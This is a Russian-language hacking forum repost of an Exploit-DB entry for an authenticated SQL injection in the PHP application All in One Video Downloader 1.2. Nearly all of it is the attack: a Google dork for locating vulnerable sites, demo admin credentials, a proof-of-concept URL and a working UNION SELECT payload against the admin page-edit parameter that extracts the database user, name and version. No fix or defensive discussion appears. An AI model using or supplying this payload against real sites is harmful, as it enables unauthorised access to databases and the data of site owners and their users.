Exploit All in One Video Downloader 1.2 - (Authenticated) SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
46077
Проверка EDB
  1. Пройдено
Автор
DEYAA MUHAMMAD
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2019-01-07
All in One Video Downloader 1.2 - (Authenticated) SQL Injection
Код:
# Exploit Title: All in One Video Downloader 1.2 - SQL Injection
# Google Dork: "developed by Niche Office"
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://nicheoffice.web.tr/
# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418
# Demo Website: https://aiovideodl.ml/
# Demo Admin Panel: https://aiovideodl.ml/admin/
# Demo Admin Credentials: [email protected]/123456
# Version: 1.2
# Tested on: WIN7_x68/cloudflare
# CVE : N/A

# POC:
https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- -

# Exploit:
https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -
 
Источник
www.exploit-db.com

Похожие темы